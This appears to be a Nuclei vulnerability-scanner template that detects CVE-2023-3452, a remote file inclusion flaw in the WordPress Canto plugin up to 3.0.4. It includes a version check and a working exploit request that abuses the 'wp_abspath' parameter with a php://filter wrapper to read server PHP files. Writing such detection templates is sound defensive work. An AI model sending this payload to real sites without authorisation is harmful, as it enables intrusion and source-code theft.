id: CVE-2023-3452

info:
  name: WordPress Canto Plugin <= 3.0.4 - File Inclusion
  author: omarkurt
  severity: critical
  description: |
    The Canto plugin for WordPress up to and including version 3.0.4 contains a remote file inclusion via the 'wp_abspath' parameter, allowing unauthenticated attackers to include and execute arbitrary remote code. Exploitation requires allow_url_include to be enabled.
  impact: |
    Attackers can execute arbitrary remote code on the server, leading to full server compromise.
  remediation: |
    Update the Canto plugin to a version above 3.0.4, or disable allow_url_include in the PHP configuration.
  reference:
    - https://www.exploit-db.com/exploits/51826
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/canto/canto-304-unauthenticated-remote-file-inclusion
    - https://nvd.nist.gov/vuln/detail/CVE-2023-3452
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-3452
    epss-score: 0.87115
    epss-percentile: 0.9946
    cwe-id: CWE-98
  metadata:
    verified: true
    max-request: 3
  tags: cve,cve2023,wordpress,wp-plugin,canto,rfi,rce,unauth,critical

flow: http(1) && http(2)

http:
  # Request 1: read the plugin readme and extract the installed version (internal only).
  - raw:
      - |
        GET /wp-content/plugins/canto/readme.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'compare_versions(version, "<= 3.0.4")'
        internal: true

    extractors:
      - type: regex
        name: version
        part: body
        group: 1
        regex:
          - '(?i)Stable tag:\s*([0-9.]+)'
        internal: true

  # Request 2: only runs if the version check passed; confirms the file inclusion
  # by matching the base64-encoded PHP/WordPress markers in the response body.
  - raw:
      - |
        GET /wp-content/plugins/canto/includes/lib/download.php?wp_abspath=php://filter/convert.base64-encode/resource=/var/www/html HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "PD9waHAK", "V29yZFByZXNz")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a00473045022037da2b0c835ac3aab683410ae83bf0d0b790aaebd80ea0b14101a34a53375f15022100b3072f189cbba13c253fc86b8f477e12fda9662b04254f4c454c7f1b100f37ea:922c64590222798bb761d5b6d8e72950